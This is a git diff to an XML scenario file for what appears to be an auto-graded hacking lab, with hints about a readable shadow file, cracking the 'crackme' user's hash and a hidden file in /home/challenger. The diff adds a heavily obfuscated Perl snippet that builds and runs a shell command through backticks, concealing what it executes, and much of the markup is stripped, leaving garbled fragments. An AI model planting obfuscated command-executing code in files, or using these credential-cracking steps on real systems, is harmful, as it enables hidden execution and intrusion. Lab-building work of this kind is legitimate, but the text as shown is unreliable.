diff --git a/scenarios/examples/auto_grading/experiment_aaa.xml b/scenarios/examples/auto_grading/experiment_aaa.xml
index 10e24bddd..dc3dc6720 100644
--- a/scenarios/examples/auto_grading/experiment_aaa.xml
+++ b/scenarios/examples/auto_grading/experiment_aaa.xml
@@ -139,13 +139,13 @@
Great job! You found something useful.
- Well done identifying that the shadow file is readable. You've got the password hashes! Try cracking the hash for the 'crackme' user.
+ Well done identifying that the shadow file is readable. You've got the password hashes! Try
+ cracking the hash for the 'crackme' user.
+
-
-
scenariosystem2vulnerability3
@@ -162,10 +162,10 @@
scenariosystem2vulnerability3
- A hidden tip.
+ Sensitive information!.
- Well done finding the hidden file. The system administrator has made an access control mistake with one of the system files used in password management.
+ Well done finding the hidden file containing sensitive information!
@@ -192,7 +192,7 @@
Fantastic work!
- Great job accessing the crackme account! If you haven't finished all of the challenges yet, try investigate the contents of /home/challenger/ closely. Additionally, scan the network to identify a vulnerable service.
+ Great job accessing the crackme account!crackme
@@ -246,7 +246,7 @@
crackme
-
+
test
@@ -265,9 +265,31 @@
/home/challenger/.top_secret_file
-
-
-
+
+ no warnings;
+ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@%)=($!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
@@ -286,7 +308,7 @@
auto_grading_server
-
+